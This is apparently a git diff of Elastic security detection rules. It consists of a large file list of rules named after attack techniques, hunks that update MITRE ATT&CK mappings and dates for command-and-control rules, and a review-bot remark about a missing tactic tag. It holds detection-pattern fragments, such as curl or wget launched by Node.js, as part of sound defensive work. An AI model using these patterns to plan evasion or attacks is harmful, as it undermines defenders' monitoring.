+- ...e_docker_shortcuts_plist_modification.toml | 13 +- ...persistence_emond_rules_file_creation.toml | 23 ++- ...istence_emond_rules_process_execution.toml | 56 ++++++- .../persistence_enable_root_account.toml | 23 ++- ...n_hidden_launch_agent_deamon_creation.toml | 15 +- ...istence_folder_action_scripts_runtime.toml | 11 +- ...rsistence_login_logout_hooks_defaults.toml | 8 +- ...stence_loginwindow_plist_modification.toml | 18 ++- ...nce_manual_chromium_extension_loading.toml | 52 ++++-- ...t_or_daemon_creation_first_occurrence.toml | 10 +- ...e_screensaver_plist_file_modification.toml | 8 +- ..._file_creation_via_pkg_install_script.toml | 44 +++-- ...tence_via_atom_init_file_modification.toml | 8 +- ...calation_applescript_with_admin_privs.toml | 19 ++- ...calation_explicit_creds_via_scripting.toml | 28 +++- ..._escalation_local_user_added_to_admin.toml | 13 +- ..._escalation_user_added_to_admin_group.toml | 13 +- ...d_control_ml_packetbeat_dns_tunneling.toml | 26 ++- ...ntrol_ml_packetbeat_rare_dns_question.toml | 34 +++- ...d_and_control_ml_packetbeat_rare_urls.toml | 21 ++- ..._ml_auth_spike_in_failed_logon_events.toml | 13 +- ..._access_ml_auth_spike_in_logon_events.toml | 19 ++- ...pike_in_logon_events_from_a_source_ip.toml | 13 +- ...ml_windows_anomalous_metadata_process.toml | 18 ++- ...execution_ml_windows_anomalous_script.toml | 23 ++- ...ess_ml_auth_rare_source_ip_for_a_user.toml | 16 +- ...windows_rare_user_type10_remote_login.toml | 21 ++- .../ml_high_count_events_for_a_host_name.toml | 69 +++++--- rules/ml/ml_high_count_network_denies.toml | 59 ++++--- ...linux_anomalous_network_port_activity.toml | 31 ++-- .../ml_low_count_events_for_a_host_name.toml | 25 +-- .../ml/ml_packetbeat_rare_server_domain.toml | 41 +++-- rules/ml/ml_rare_destination_country.toml | 54 +++++-- .../ml/ml_spike_in_traffic_to_a_country.toml | 51 +++--- ...ml_windows_anomalous_network_activity.toml | 41 +++-- ...tence_ml_rare_process_by_host_windows.toml | 23 ++- 
...ml_windows_anomalous_process_creation.toml | 31 +++- ...sistence_ml_windows_anomalous_service.toml | 23 ++- ...tion_ml_linux_anomalous_sudo_activity.toml | 20 +-- ...tion_ml_windows_rare_user_runas_event.toml | 18 ++- ..._ml_linux_anomalous_compiler_activity.toml | 31 +++- .../collection_fortigate_config_download.toml | 24 ++- ...cepted_default_telnet_port_connection.toml | 19 ++- ...mand_and_control_cobalt_strike_beacon.toml | 12 +- ...cobalt_strike_default_teamserver_cert.toml | 10 +- .../command_and_control_fin7_c2_behavior.toml | 12 +- .../command_and_control_halfbaked_beacon.toml | 12 +- ...d_control_nat_traversal_port_activity.toml | 18 ++- .../command_and_control_port_26_activity.toml | 21 ++- ...te_desktop_protocol_from_the_internet.toml | 17 +- ...l_network_computing_from_the_internet.toml | 13 +- ...ual_network_computing_to_the_internet.toml | 21 ++- ...very_potential_network_sweep_detected.toml | 8 +- ...rtigate_sso_login_from_unusual_source.toml | 26 ++- ...mote_procedure_call_from_the_internet.toml | 10 +- ...remote_procedure_call_to_the_internet.toml | 21 ++- ...al_access_unsecure_elasticsearch_node.toml | 16 +- .../lateral_movement_dns_server_overflow.toml | 21 ++- ..._sso_login_followed_by_admin_creation.toml | 19 ++- .../execution_endgame_exploit_detected.toml | 11 +- .../execution_endgame_exploit_prevented.toml | 11 +- ...ion_endgame_permission_theft_detected.toml | 8 +- ...on_endgame_permission_theft_prevented.toml | 8 +- ...ion_email_powershell_exchange_mailbox.toml | 17 +- .../collection_mailbox_export_winlog.toml | 12 +- .../collection_posh_audio_capture.toml | 21 ++- .../command_and_control_certreq_postdata.toml | 21 ++- ...ommand_and_control_common_webservices.toml | 51 ++++-- .../command_and_control_dns_susp_tld.toml | 26 ++- .../command_and_control_iexplore_via_com.toml | 34 +++- ...ontrol_multiple_rmm_vendors_same_host.toml | 9 +- ...control_new_terms_commonly_abused_rmm.toml | 15 +- ...command_and_control_outlook_home_page.toml | 13 
+- ...ontrol_port_forwarding_added_registry.toml | 18 ++- .../command_and_control_rdp_tunnel_plink.toml | 15 +- .../command_and_control_remcos_rat_iocs.toml | 39 ++++- ..._and_control_remote_file_copy_scripts.toml | 13 +- ...d_and_control_screenconnect_childproc.toml | 97 ++++++++++- ...nd_and_control_tool_transfer_via_curl.toml | 26 ++- ...ommand_and_control_tunnel_cloudflared.toml | 13 +- .../command_and_control_tunnel_yuze.toml | 26 ++- ..._control_velociraptor_shell_execution.toml | 44 ++++- ...ential_access_browsers_unusual_parent.toml | 20 ++- ...redential_access_dcsync_user_backdoor.toml | 18 ++- ...ntial_access_disable_kerberos_preauth.toml | 26 ++- .../credential_access_dnsnode_creation.toml | 8 +- ..._access_dollar_account_relay_kerberos.toml | 18 ++- ...cess_domain_backup_dpapi_private_keys.toml | 17 +- ..._access_iis_connectionstrings_dumping.toml | 13 +- ...ccess_imageload_azureadconnectauthsvc.toml | 21 ++- ..._access_kerberoasting_unusual_process.toml | 21 ++- .../credential_access_kerberos_coerce.toml | 17 +- ...credential_access_kerberos_coerce_dns.toml | 17 +- .../credential_access_ldap_attributes.toml | 26 ++- ...edential_access_lsass_loaded_susp_dll.toml | 23 ++- ...tial_access_machine_account_smb_relay.toml | 23 ++- ...l_access_mimikatz_memssp_default_logs.toml | 24 ++- ...ial_access_mimikatz_powershell_module.toml | 26 ++- ..._access_mod_wdigest_security_provider.toml | 18 ++- ...l_access_moving_registry_hive_via_smb.toml | 23 ++- ...e_network_logon_provider_modification.toml | 11 +- ...edential_access_posh_invoke_ninjacopy.toml | 22 ++- ...edential_access_posh_kerb_ticket_dump.toml | 19 ++- .../credential_access_posh_relay_tools.toml | 19 ++- .../credential_access_posh_veeam_sql.toml | 20 ++- ...ential_access_rare_webdav_destination.toml | 21 ++- ...ial_access_regback_sam_security_hives.toml | 9 +- ...cess_relay_ntlm_auth_via_http_spoolss.toml | 18 ++- .../credential_access_shadow_credentials.toml | 16 +- 
...dential_access_spn_attribute_modified.toml | 18 ++- ...l_access_suspicious_comsvcs_imageload.toml | 22 ++- ...cious_winreg_access_via_sebackup_priv.toml | 13 +- ..._symbolic_link_to_shadow_copy_created.toml | 18 ++- .../credential_access_veeam_commands.toml | 21 ++- ...dential_access_web_config_file_access.toml | 23 ++- ...dential_access_wireless_creds_dumping.toml | 18 ++- ...efense_evasion_amsi_bypass_powershell.toml | 22 ++- ...e_evasion_clearing_windows_event_logs.toml | 12 +- ...ication_apps_suspicious_child_process.toml | 21 ++- ...e_evasion_create_mod_root_certificate.toml | 18 ++- .../windows/defense_evasion_disable_nla.toml | 24 ++- ...vasion_dotnet_compiler_parent_process.toml | 46 +++++- ...evasion_enable_inbound_rdp_with_netsh.toml | 23 ++- ...ense_evasion_execution_lolbas_wuauclt.toml | 16 +- ...ecution_msbuild_started_by_office_app.toml | 18 ++- ...n_execution_msbuild_started_by_script.toml | 21 ++- ...ion_msbuild_started_by_system_process.toml | 13 +- ...cution_msbuild_started_unusal_process.toml | 25 ++- ...sion_execution_windefend_unusual_path.toml | 22 ++- ...sion_hide_encoded_executable_registry.toml | 15 +- ...ense_evasion_iis_httplogging_disabled.toml | 12 +- ...defense_evasion_indirect_exec_conhost.toml | 29 +++- ...defense_evasion_indirect_exec_openssh.toml | 8 +- .../defense_evasion_injection_msbuild.toml | 19 +-- ...efense_evasion_lolbas_win_cdb_utility.toml | 15 +- ...e_evasion_lsass_ppl_disabled_registry.toml | 24 ++- ...querading_as_elastic_endpoint_process.toml | 13 +- ...e_evasion_masquerading_renamed_autoit.toml | 23 ++- ...erading_suspicious_werfault_childproc.toml | 30 ++-- ..._evasion_microsoft_defender_tampering.toml | 8 +- ...on_msbuild_making_network_connections.toml | 18 ++- .../defense_evasion_mshta_susp_child.toml | 34 +++- ...efense_evasion_msiexec_remote_payload.toml | 18 ++- .../defense_evasion_msxsl_network.toml | 16 +- ...etwork_connection_from_windows_binary.toml | 45 +++++- 
...e_evasion_parent_process_pid_spoofing.toml | 24 +-- ...persistence_account_tokenfilterpolicy.toml | 20 ++- .../defense_evasion_posh_assembly_load.toml | 15 +- .../defense_evasion_posh_compressed.toml | 15 +- .../defense_evasion_posh_encryption.toml | 21 ++- .../defense_evasion_posh_high_entropy.toml | 16 +- .../defense_evasion_posh_obfuscation.toml | 15 +- ...nse_evasion_posh_obfuscation_backtick.toml | 15 +- ...evasion_posh_obfuscation_backtick_var.toml | 15 +- ..._evasion_posh_obfuscation_char_arrays.toml | 15 +- ...asion_posh_obfuscation_concat_dynamic.toml | 15 +- ...sh_obfuscation_high_number_proportion.toml | 15 +- ...fuscation_iex_env_vars_reconstruction.toml | 15 +- ...obfuscation_iex_string_reconstruction.toml | 15 +- ...asion_posh_obfuscation_index_reversal.toml | 15 +- ...sion_posh_obfuscation_reverse_keyword.toml | 15 +- ...vasion_posh_obfuscation_string_concat.toml | 15 +- ...vasion_posh_obfuscation_string_format.toml | 15 +- ...scation_whitespace_special_proportion.toml | 15 +- ...efense_evasion_posh_process_injection.toml | 15 +- ...ense_evasion_proxy_execution_via_msdt.toml | 26 ++- ...eg_disable_enableglobalqueryblocklist.toml | 15 +- ...efense_evasion_regmod_remotemonologue.toml | 21 ++- ...fense_evasion_sccm_scnotification_dll.toml | 8 +- .../defense_evasion_script_via_html_app.toml | 28 +++- ...ackdoor_service_disabled_via_registry.toml | 23 ++- ..._evasion_suspicious_certutil_commands.toml | 34 +++- ...picious_execution_from_mounted_device.toml | 38 ++++- ...n_suspicious_managedcode_host_process.toml | 34 +++- ...suspicious_process_creation_calltrace.toml | 8 +- ...efense_evasion_suspicious_scrobj_load.toml | 18 ++- ...defense_evasion_suspicious_wmi_script.toml | 13 +- ...evasion_suspicious_zoom_child_process.toml | 23 ++- ..._critical_proc_abnormal_file_activity.toml | 19 ++- ...fense_evasion_untrusted_driver_loaded.toml | 13 +- ...nusual_network_connection_via_dllhost.toml | 16 +- ...on_unusual_process_network_connection.toml | 28 +++- 
...vasion_wdac_policy_by_unusual_process.toml | 8 +- ...se_evasion_windows_filtering_platform.toml | 12 +- ...evasion_workfolders_control_execution.toml | 23 ++- .../defense_evasion_wsl_bash_exec.toml | 26 ++- .../defense_evasion_wsl_child_process.toml | 21 ++- .../defense_evasion_wsl_enabled_via_dism.toml | 8 +- .../defense_evasion_wsl_filesystem.toml | 21 ++- .../defense_evasion_wsl_kalilinux.toml | 21 ++- ...nse_evasion_wsl_registry_modification.toml | 21 ++- ...discovery_active_directory_webservice.toml | 23 ++- .../discovery_command_system_account.toml | 13 +- .../discovery_high_number_ad_properties.toml | 23 ++- ...scovery_host_public_ip_address_lookup.toml | 11 +- ...scovery_posh_suspicious_api_functions.toml | 43 ++++- .../discovery_whoami_command_activity.toml | 8 +- .../windows/execution_com_object_xwizard.toml | 18 ++- ...and_prompt_connecting_to_the_internet.toml | 16 +- ...tion_command_shell_started_by_svchost.toml | 13 +- ...tion_delayed_via_ping_lolbas_unsigned.toml | 34 +++- .../execution_downloaded_url_file.toml | 13 +- .../execution_enumeration_via_wmiprvse.toml | 38 ++++- .../execution_from_unusual_path_cmdline.toml | 48 +++++- ...le_program_connecting_to_the_internet.toml | 23 ++- ...cution_initial_access_foxmail_exploit.toml | 11 +- ...execution_initial_access_via_msc_file.toml | 28 +++- ...cution_initial_access_wps_dll_exploit.toml | 29 +++- .../execution_ms_office_written_file.toml | 23 ++- .../execution_nodejs_susp_patterns.toml | 20 ++- ...cution_notepad_markdown_child_process.toml | 12 +- .../execution_posh_hacktool_functions.toml | 150 +++++++++++++++++- .../execution_posh_portable_executable.toml | 20 ++- ...on_powershell_susp_args_via_winscript.toml | 26 ++- .../execution_revshell_cmd_via_netcat.toml | 17 +- ...tion_scheduled_task_powershell_source.toml | 25 ++- .../execution_scripting_remote_webdav.toml | 33 +++- .../execution_scripts_archive_file.toml | 21 ++- ...xecution_shared_modules_local_sxs_dll.toml | 21 ++- 
.../execution_susp_javascript_via_deno.toml | 30 +++- .../windows/execution_suspicious_cmd_wmi.toml | 23 ++- .../execution_suspicious_pdf_reader.toml | 92 ++++++++++- .../execution_suspicious_psexesvc.toml | 28 +++- .../execution_via_compiled_html_file.toml | 30 +++- .../execution_via_hidden_shell_conhost.toml | 21 +-- ...ion_via_mmc_console_file_unusual_path.toml | 18 ++- ...execution_windows_cmd_shell_susp_args.toml | 46 +++++- .../execution_windows_fakecaptcha_cmd_ps.toml | 29 +++- .../execution_windows_phish_clickfix.toml | 30 +++- ...xecution_windows_powershell_susp_args.toml | 41 ++++- ...xecution_windows_script_from_internet.toml | 29 +++- .../exfiltration_rclone_cloud_upload.toml | 31 +++- .../exfiltration_smb_rare_destination.toml | 16 +- ...pact_high_freq_file_renames_by_kernel.toml | 17 +- .../windows/impact_mod_critical_os_files.toml | 14 +- .../impact_ransomware_file_rename_smb.toml | 15 +- .../impact_ransomware_note_file_over_smb.toml | 15 +- ...impact_stop_process_service_threshold.toml | 21 ++- ...e_shadow_copy_deletion_via_powershell.toml | 15 +- ..._evasion_suspicious_htm_file_creation.toml | 28 +++- ...itial_access_execution_from_inetcache.toml | 26 ++- ...l_access_execution_remote_via_msiexec.toml | 23 ++- ...al_access_execution_via_office_addins.toml | 33 +++- ...ial_access_exploit_jetbrains_teamcity.toml | 89 ++++++++++- ..._access_potential_webhelpdesk_exploit.toml | 49 +++++- ...itial_access_rdp_file_mail_attachment.toml | 23 ++- ...al_access_script_executing_powershell.toml | 15 +- ...ccess_scripts_process_started_via_wmi.toml | 15 +- ...cious_execution_from_vscode_extension.toml | 63 +++++++- ...l_access_suspicious_ms_exchange_files.toml | 24 ++- ...ious_ms_exchange_worker_child_process.toml | 26 ++- ...ss_suspicious_ms_office_child_process.toml | 92 ++++++++++- ...s_suspicious_ms_outlook_child_process.toml | 49 +++++- ..._suspicious_windows_server_update_svc.toml | 44 ++++- .../initial_access_url_cve_2025_33053.toml | 30 +++- 
...explorer_suspicious_child_parent_args.toml | 34 +++- ..._access_webshell_screenconnect_server.toml | 26 ++- ...l_access_xsl_script_execution_via_com.toml | 41 ++++- .../windows/lateral_movement_cmd_service.toml | 18 ++- ...redential_access_kerberos_correlation.toml | 14 +- rules/windows/lateral_movement_dcom_hta.toml | 28 +++- .../windows/lateral_movement_dcom_mmc20.toml | 28 +++- ...t_dcom_shellwindow_shellbrowserwindow.toml | 23 ++- ...ateral_movement_evasion_rdp_shadowing.toml | 18 ++- ..._movement_execution_from_tsclient_mup.toml | 10 +- ...nt_execution_via_file_shares_sequence.toml | 10 +- .../lateral_movement_incoming_wmi.toml | 11 +- .../lateral_movement_rdp_sharprdp_target.toml | 28 +++- ...ovement_remote_file_copy_hidden_share.toml | 26 ++- ...ement_remote_service_installed_winlog.toml | 26 ++- .../lateral_movement_remote_services.toml | 21 ++- ...movement_unusual_dns_service_children.toml | 16 +- ...ement_unusual_dns_service_file_writes.toml | 15 +- ...l_movement_via_startup_folder_rdp_smb.toml | 18 ++- .../lateral_movement_via_wsus_update.toml | 10 +- .../persistence_appcertdlls_registry.toml | 24 +-- ...persistence_browser_extension_install.toml | 8 +- ...evasion_hidden_local_account_creation.toml | 23 ++- ...egistry_startup_shell_folder_modified.toml | 24 +-- ...sistence_group_modification_by_system.toml | 20 +-- .../persistence_ms_outlook_vba_template.toml | 8 +- ...ersistence_msi_installer_task_startup.toml | 17 +- ...persistence_msoffice_startup_registry.toml | 24 +-- ...ll_exch_mailbox_activesync_add_device.toml | 28 +++- .../persistence_powershell_profiles.toml | 24 +-- ...escalation_via_accessibility_features.toml | 30 ++-- .../persistence_registry_uncommon.toml | 31 +++- ...persistence_run_key_and_startup_broad.toml | 18 ++- ...ce_runtime_run_key_startup_susp_procs.toml | 71 ++++++++- ...istence_sdprop_exclusion_dsheuristics.toml | 18 ++- .../persistence_service_dll_unsigned.toml | 23 ++- .../persistence_services_registry.toml | 16 +- 
...stence_suspicious_com_hijack_registry.toml | 41 +---- ...s_image_load_scheduled_task_ms_office.toml | 24 +-- ...nce_suspicious_scheduled_task_runtime.toml | 71 +++++++-- ...uspicious_user_mandatory_profile_file.toml | 12 +- ...ersistence_system_shells_via_services.toml | 18 ++- .../persistence_temp_scheduled_task.toml | 24 +-- .../persistence_time_provider_mod.toml | 29 +--- ..._account_added_to_privileged_group_ad.toml | 8 +- .../persistence_user_account_creation.toml | 10 +- .../persistence_via_application_shimming.toml | 24 +-- ...sistence_via_hidden_run_key_valuename.toml | 16 +- ...emetrycontroller_scheduledtask_hijack.toml | 29 +--- ...ia_update_orchestrator_service_hijack.toml | 21 ++- ...tence_via_wmi_stdregprov_run_services.toml | 30 +++- .../persistence_webshell_detection.toml | 19 ++- .../persistence_werfault_reflectdebugger.toml | 11 +- ...privilege_escalation_credroaming_ldap.toml | 8 +- ...ilege_escalation_disable_uac_registry.toml | 22 +-- ...alation_dmsa_creation_by_unusual_user.toml | 23 ++- ...e_escalation_dns_serverlevelplugindll.toml | 29 +++- ...ege_escalation_driver_newterm_imphash.toml | 18 ++- ...lege_escalation_expired_driver_loaded.toml | 16 +- ...lege_escalation_exploit_cve_202238028.toml | 16 +- ...calation_gpo_schtask_service_creation.toml | 18 ++- ...ege_escalation_group_policy_iniscript.toml | 18 ++- ...rivilege_escalation_installertakeover.toml | 24 ++- ...scalation_krbrelayup_service_creation.toml | 15 +- ...privilege_escalation_lsa_auth_package.toml | 24 +-- ...e_escalation_named_pipe_impersonation.toml | 8 +- ...ge_escalation_persistence_phantom_dll.toml | 29 +--- ...on_port_monitor_print_processor_abuse.toml | 28 +--- ...e_escalation_posh_token_impersonation.toml | 15 +- ...ation_printspooler_registry_copyfiles.toml | 19 ++- ..._printspooler_service_suspicious_file.toml | 13 +- ...printspooler_suspicious_file_deletion.toml | 21 ++- ..._escalation_reg_service_imagepath_mod.toml | 25 ++- 
...calation_rogue_windir_environment_var.toml | 18 ++- ...lation_samaccountname_spoofing_attack.toml | 21 ++- ...on_service_control_spawned_script_int.toml | 28 +++- ...alation_suspicious_dnshostname_update.toml | 10 +- ...lege_escalation_uac_bypass_com_clipup.toml | 27 +--- ...ge_escalation_uac_bypass_com_ieinstal.toml | 26 ++- ...n_uac_bypass_com_interface_icmluautil.toml | 27 +--- ...alation_uac_bypass_diskcleanup_hijack.toml | 30 ++-- ...escalation_uac_bypass_dll_sideloading.toml | 30 +--- ...ge_escalation_uac_bypass_event_viewer.toml | 24 +-- ...ege_escalation_uac_bypass_mock_windir.toml | 22 +-- ...scalation_uac_bypass_winfw_mmc_hijack.toml | 22 +-- ...tion_unusual_parentchild_relationship.toml | 33 +++- ...n_unusual_svchost_childproc_childless.toml | 30 ++-- ...ilege_escalation_via_rogue_named_pipe.toml | 8 +- ...collection_archive_data_zip_imageload.toml | 8 +- ...ction_common_compressed_archived_file.toml | 20 ++- ...tion_files_staged_in_recycle_bin_root.toml | 23 ++- ...llection_microsoft_purview_dlp_signal.toml | 28 +++- .../collection_outlook_email_archive.toml | 12 +- .../collection_posh_compression.toml | 18 ++- ...ommand_and_control_bitsadmin_activity.toml | 26 +-- ...d_control_certutil_network_connection.toml | 16 +- ...llama_model_download_untrusted_source.toml | 15 +- ...access_entra_id_risk_detection_signal.toml | 12 +- ...ntial_access_iis_apppoolsa_pwd_appcmd.toml | 13 +- ...dential_access_win_private_key_access.toml | 18 ++- ...ense_evasion_cmd_copy_binary_contents.toml | 15 +- .../defense_evasion_dll_hijack.toml | 10 +- ...evasion_dotnet_clickonce_dfsvc_netcon.toml | 12 +- ...fense_evasion_download_susp_extension.toml | 26 ++- ...cution_via_visualstudio_prebuildevent.toml | 18 ++- .../defense_evasion_generic_deletion.toml | 18 ++- ...fense_evasion_injection_from_msoffice.toml | 41 +++-- ...ense_evasion_masquerading_windows_dll.toml | 23 +-- ...ion_masquerading_windows_system32_exe.toml | 16 +- ...soft_security_compliance_admin_signal.toml | 27 
+++- ...fense_evasion_msdt_suspicious_diagcab.toml | 21 ++- ...ense_evasion_outlook_suspicious_child.toml | 21 ++- ..._obfuscation_proportion_special_chars.toml | 15 +- ...nse_evasion_service_disabled_registry.toml | 16 +- ...defense_evasion_service_path_registry.toml | 33 ++-- .../defense_evasion_services_exe_path.toml | 33 ++-- ...nse_evasion_unusual_process_path_wbem.toml | 8 +- .../defense_evasion_write_dac_access.toml | 18 ++- .../discovery_generic_account_groups.toml | 14 +- .../discovery_hosts_file_access.toml | 7 +- ...ry_kernel_module_enumeration_via_proc.toml | 8 +- ...ubectl_workload_and_cluster_discovery.toml | 12 +- .../discovery_linux_modprobe_enumeration.toml | 24 ++- .../discovery_linux_sysctl_enumeration.toml | 32 +++- .../discovery_net_share_discovery_winlog.toml | 24 ++- .../discovery_of_domain_groups.toml | 8 +- .../discovery_posh_generic.toml | 35 ++-- .../discovery_posh_password_policy.toml | 26 ++- ...ery_potential_memory_seeking_activity.toml | 15 +- ...ote_system_discovery_commands_windows.toml | 13 +- .../discovery_system_network_connections.toml | 8 +- .../discovery_system_service_discovery.toml | 13 +- .../discovery_system_time_discovery.toml | 8 +- .../discovery_win_network_connections.toml | 13 +- ..._windows_system_information_discovery.toml | 26 ++- ...ution_github_new_event_action_for_pat.toml | 39 ++++- ...n_github_new_repo_interaction_for_pat.toml | 21 ++- ..._github_new_repo_interaction_for_user.toml | 21 ++- .../execution_github_repo_created.toml | 21 ++- ...n_github_repo_interaction_from_new_ip.toml | 39 ++++- .../execution_linux_segfault.toml | 8 +- ...ution_settingcontent_ms_file_creation.toml | 28 +++- ...execution_unsigned_service_executable.toml | 28 +++- ...itial_access_aws_signin_token_created.toml | 23 ++- ..._access_github_new_ip_address_for_pat.toml | 23 ++- ..._access_github_new_user_agent_for_pat.toml | 23 ++- ...t_defender_threat_intelligence_signal.toml | 24 ++- ...s_microsoft_quarantine_hygiene_signal.toml | 12 
+- ...cess_new_okta_authentication_behavior.toml | 13 +- ...cess_okta_admin_console_login_failure.toml | 11 +- .../lateral_movement_posh_winrm_activity.toml | 17 +- ...movement_unusual_process_sql_accounts.toml | 34 +++- .../lateral_movement_wmic_remote.toml | 15 +- ...e_aws_iam_login_profile_added_to_user.toml | 14 +- .../persistence_github_new_pat_for_user.toml | 23 ++- ...github_new_user_added_to_organization.toml | 10 +- ...e_iam_instance_request_to_iam_service.toml | 16 +- ...ce_web_server_potential_sql_injection.toml | 15 +- ...sistence_web_server_sus_file_creation.toml | 15 +- ..._escalation_sts_getsessiontoken_abuse.toml | 26 ++- 1174 files changed, 20817 insertions(+), 4993 deletions(-) diff --git a/rules/cross-platform/command_and_control_common_llm_endpoint.toml b/rules/cross-platform/command_and_control_common_llm_endpoint.toml index 8614a7cea40..b15f7f8f511 100644 --- a/rules/cross-platform/command_and_control_common_llm_endpoint.toml +++ b/rules/cross-platform/command_and_control_common_llm_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] @@ -150,16 +150,18 @@ network where host.os.type in ("macos", "windows") and dns.question.name != null [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" - +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - - diff --git a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml index 5ba4932123d..f8c152baafe 100644 
--- a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml +++ b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,17 +123,22 @@ process.parent.name in ("node", "bun", "node.exe", "bun.exe") and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml b/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml index b508ee3bf19..235c22f4eb0 100644 --- a/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml +++ b/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/06/19" integration = ["endpoint", "system"] maturity = "production" -updated_date = "2025/02/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,23 @@ Google Drive is a widely-used cloud storage service that allows users to store a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.003" +name = "One-Way Communication" +reference = "https://attack.mitre.org/techniques/T1102/003/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml index 4ed6298ead7..ba94e8a181e 100644 --- a/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml +++ b/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/18" integration = ["endpoint", "panw"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -70,6 +70,11 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml index 0ca53756373..46c2d36826f 100644 --- a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml 
+++ b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["endpoint", "suricata"] maturity = "production" -updated_date = "2026/01/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,7 +76,30 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/command_and_control_tunnel_qemu.toml b/rules/cross-platform/command_and_control_tunnel_qemu.toml index 6a3c887e279..6441d002cd9 100644 --- a/rules/cross-platform/command_and_control_tunnel_qemu.toml +++ b/rules/cross-platform/command_and_control_tunnel_qemu.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
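Review bot: `tags` is not updated for the Discovery tactic (TA0007) introduced by the second `[[rule.threat]]` block at the end of this hunk, so unless the array (outside this hunk) already carries `"Tactic: Discovery"`, the tactic/tag consistency check in tests/test_all_rules.py will report a missing tag for this rule. The mapping itself also deserves a second look: the rule's name and its existing TA0011 block describe C2 detection, and T1046 (Network Service Discovery) only fits if the Suricata signatures this rule correlates on include scan/enumeration alerts, which is not visible here. Either add the tag and a one-line justification in the rule `note`, or drop the TA0007 block.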
